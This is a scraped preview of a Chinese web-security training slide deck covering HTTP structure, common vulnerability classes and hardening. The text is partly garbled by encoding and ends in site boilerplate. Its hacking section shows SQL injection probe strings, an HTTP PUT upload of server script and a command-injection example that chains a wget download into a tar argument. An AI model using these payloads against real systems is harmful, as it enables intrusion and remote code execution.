web安全基礎(優(yōu)揚科技)_第1頁
web安全基礎(優(yōu)揚科技)_第2頁
web安全基礎(優(yōu)揚科技)_第3頁
web安全基礎(優(yōu)揚科技)_第4頁
web安全基礎(優(yōu)揚科技)_第5頁
已閱讀5頁,還剩58頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

1、Why- Search, Dig , and Hack !ContentWhy WEB?1HTTP2Hacking3Hardening4ContentWhy WEB?1HTTP2Hacking3Hardening4Why WEB ?vWEB奮起 瘦客戶端 瀏覽器能做什么?還有什么瀏覽器不能做? 沒有瀏覽器的電腦? Internet的新泡沫時代Why WEB ?v為什么 WEB 是非多 威脅的可疊加特性 Internet 爆炸 二把刀程序員 個人站點:臭美 可用 安全Why WEB ?v令人絕望的 WEB 2.0 善用?濫用?Why WEB ?vWEB安全大事記1999 XSS was reco

2、gnisedwhisker 1.0 released next-generation CGI scanner 1998 Phrack 54 NT Web Technology VulnerabilitiesSQL Injection2001OWASP StartedNikto 1.0 released2003SQL Slammer OWASP Testing guideWebInspect 3.02004OWASP TOP 10 released2005Samy WormAcunetix scanner releasedWhy WEB ?vWEB安全的一點數(shù)據(jù)Source : IBM X-Fo

3、rce 2010 Trend and Risk ReportWhy WEB ?vWEB安全的一點數(shù)據(jù)Source : IBM X-Force 2010 Trend and Risk ReportContentWhy WEB?1HTTP2Hacking3Hardening4HTTPv版本與歷史HTTP/0.9HTTP/1.0HTTP/1.1Year : 1990-1991簡單但不大方簡單但不大方Year : 1996RFC 1945過渡版本過渡版本持續(xù)完善持續(xù)完善至今仍被兼容至今仍被兼容Year : 1997RFC 2068目前最完善版本目前最完善版本持續(xù)改進與發(fā)展持續(xù)改進與發(fā)展Source:

4、RFC 2616v 結構 (HTTP Request)GET / HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, app

5、lication/msword, application/QVOD, application/QVOD, */*Accept-Language: zh-cnUA-CPU: x86Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)H

6、ost: Connection: Keep-AliveCookie: PREF=ID=ab655c79fc00eca5:U=1da01670686c1b4a:FF=0:LD=en:NW=1:CR=2:TM=1258614972:LM=1310117743:GM=1:S=3dm6LuBXWmGJn68p; NID=48=FYQN5JhSwChd_pgXNBw9-u6xMkefYb23gg6b24tApMve2lVAdBzX6xVSgeXFhdQM9DtKnHda7Kh_v6WAG_y0QtOukKDuBXOrH7psDHjV31NnI9-Pu8sNcLOHVjGWGhJc; rememberme

7、=falseHTTPv結構 (HTTP Request) HTTP Request數(shù)據(jù)結構概述METHOD /PATH HTTP/VERISIONHEADER1: ContentHEADER2: ContentHEADER3: ContentHEADER4: ContentPOST DATAsHTTPv結構 (HTTP Request) HTTP Request數(shù)據(jù)結構概述GET / HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+xml, application/vnd

8、.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*Accept-Language: zh-cnUA-CPU: x86Accept-Encoding: gzip, deflateUser-Agent: Mozilla/

9、4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Host: Connection: Keep-AliveCookie: PREF=ID=ab655c79fc00eca5:U=1da01670686c1b4a:FF=0:LD=en:NW=1:CR=2:TM=1258614972:LM=1310117743:GM=1:S=3dm6

10、LuBXWmGJn68p; NID=48=FYQN5JhSwChd_pgXNBw9-u6xMkefYb23gg6b24tApMve2lVAdBzX6xVSgeXFhdQM9DtKnHda7Kh_v6WAG_y0QtOukKDuBXOrH7psDHjV31NnI9-Pu8sNcLOHVjGWGhJc; rememberme=false我要干什么我能識別什么我說什么話我用什么工具我要找誰對了!忘了告訴你我是誰HTTPv結構 (HTTP Request) HTTP Method常見的:GET、POST偶爾見到的:HEAD, RACE, LOCK,OPTIONS,PUT, MOVE, COPY, DE

11、LETE, CONNECTv結構 (HTTP Response)HTTP/1.1 200 OKDate: Fri, 08 Jul 2011 14:35:23 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8Content-Encoding: gzipServer: gwsContent-Length: 11746X-XSS-Protection: 1; mode=blockxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

12、xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxHTTP Response in the realworld HTTPv結構 (HTTP Response) HTTP Response數(shù)據(jù)結構概述HTTP/VERSION Status_Code Status_Code_descH

13、EADER1: ContentHEADER2: ContentHEADER3: ContentX-HEADER: ContentRESPONSE DATAsRESPONSE DATAs.HTTPv結構 (HTTP Response) HTTP Response數(shù)據(jù)結構概述HTTP/1.1 200 OKDate: Fri, 08 Jul 2011 14:35:23 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8Content-Encoding: gzipServer: gw

14、sContent-Length: 11746X-XSS-Protection: 1; mode=blockxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx成功返回數(shù)據(jù)立刻過期緩存

15、控制。Private: 訪問服務器而非緩存;Max-age=0 : 0秒內使用緩存數(shù)據(jù)內容類型服務器類型返回長度擴展(預留)字段此處意為支持瀏覽器的XSS過濾器時間(GMT)HTTPv結構 (HTTP Response) HTTP Response數(shù)據(jù)結構概述HTTP/1.1 200 OKDate: Fri, 08 Jul 2011 14:35:23 GMTExpires: -1Cache-Control: private, max-age=0Content-Type: text/html; charset=UTF-8Content-Encoding: gzipServer: gwsConte

16、nt-Length: 11746X-XSS-Protection: 1; mode=blockxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEntity HeaderEntit

17、y BodyHTTPv結構 (HTTP Response) Status Code常見: 200 , OK 201 , Create 301 , Moved Permanently 302 , Found (temporarily) 400 , Bad Request 401 , Unauthorized 404 , Not Found 500 , Internal Server ErrorHTTPv典型 GET vs POSTGET 方法方法 1、提交內容在URL中 2、RFC 2616 未限制URL長度 3、IE限制URL長度為2083個字符 4、Firefox限制URL長度65536個字

18、符POST 方法方法 1、提交內容置于請求實體中 2、以修改服務端內容為設計目的(RFC2616 /9.5) 3、長度無限制HTTPv典型 GET vs POSTGET/POST的安全問題的安全問題 1、360泄露用戶信息事件 2、代碼混淆GET與POST請求HTTPv典型 HEAD vs GETHEAD 獲取Entity HeaderGET 獲取全部responseHTTPv典型 HEAD vs GETGET 獲取全部responseHEAD 獲取Entity HeaderHTTPv典型 HEAD vs GETHEAD 用途用途 1、Scanner 版本信息 2、下載工具 文件長度預載HTT

19、Pv典型 REFERER 字段用途Referer 告訴WEB程序 :我從哪里來HTTPv典型 REFERER 字段用途Referer 告訴WEB程序 :我從哪里來HTTPv典型 REFERER 字段用途Referer 的用途的用途 1、防止盜鏈 2、CSRF防護 3、Google hacking與入侵分析HTTPv典型 HOST字段用途HTTPv典型 HOST字段用途ContentWhy WEB?1HTTP2Hacking3Hardening4Hackingv7類常見漏洞示例 配置錯誤 注入漏洞 跨站腳本 認證錯誤 錯誤信息 參數(shù)錯誤 邏輯錯誤Hackingv配置錯誤 indexesHacki

20、ngv配置錯誤 indexesHackingv配置錯誤 indexes DirectoryIndex index.html index.cgi index.pl index.php index.xhtml index.htm. Options Indexes FollowSymLinks AllowOverride None Order allow,deny allow from allHackingv配置錯誤 HTTP PUTPUT /test.txt HTTP/1.1Host: Content-Length: 1220% if Trim(request(syfdpath) then %Ha

21、ckingv配置錯誤 HTTP PUTHTTP OPTIONS方法方法Hackingv配置錯誤 HTTP PUTWindows 2000 + IIS 5.0 的某些必然性的某些必然性本地權限IIS權限Hackingv配置錯誤 HTTP PUTWindows 2000 權限特性及繼承方式權限特性及繼承方式根目錄:Everyone:F異曲同工之妙:Windows 2000 下的FrontPageHackingv配置錯誤 backup 永遠不要直接在永遠不要直接在WEB目錄中編輯程序目錄中編輯程序哪怕你知道你在做什么,但不一定知道你的編輯器在做什么哪怕你知道你在做什么,但不一定知道你的編輯器在做什么

22、 !Hackingv注入漏洞 SQL注入Select * from table_name where id=1Select * from table_name where id=1Select * from table_name where id=1 and 1=1Select * from table_name where id=1 and 1=2Select * from table_name where id=1 and (select )Injection Tools: 1、SQL Helper 2、SQLMAP (v0.9)Hackingv注入漏洞 JS下的SQL注入用戶注冊時觸發(fā)用

23、戶注冊時觸發(fā)JS腳本對用戶名自動檢查可用性腳本對用戶名自動檢查可用性Hackingv注入漏洞 命令注入Apache Log:/s_tar.php?S_sid=79d18ddc9&http:/ Keyword:1. cc.tar2. ;(分號)(分號)3. wgettar 命令:命令:tar cvf somefile.tar dir1 dir2 .Linux多命令方式:多命令方式:Command1; Command2; Command3; .Linux多命令錯誤機制:多命令錯誤機制:前一條命令錯誤,下一條繼續(xù)執(zhí)行前一條命令錯誤,下一條繼續(xù)執(zhí)行調用:調用:tar cf cc.tar;wget ;d

24、ir1 dir2 Hackingv跨站腳本 存儲型 反射型 DOM型Hackingv跨站腳本 原理簡單,利用卻不簡單WEB 2.0 是是XSS的新溫床的新溫床XSS/CSRF WORM : Samy worm & Sina weibo worm1、跨站URL:http:/ a、發(fā)微博 b、加關注 c、發(fā)私信About Samy Worm:/wiki/Samy_(XSS)http:/namb.la/popular/Hackingv認證錯誤 無認證頁面Hackingv認證錯誤 無認證頁面Hackingv認證錯誤 原始信息的校驗方式1、不校驗、不校驗 直接構造惡意數(shù)據(jù)修改密碼直接構造惡意數(shù)據(jù)修改密碼2、校驗、校驗COOKIE CSRFHacki

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論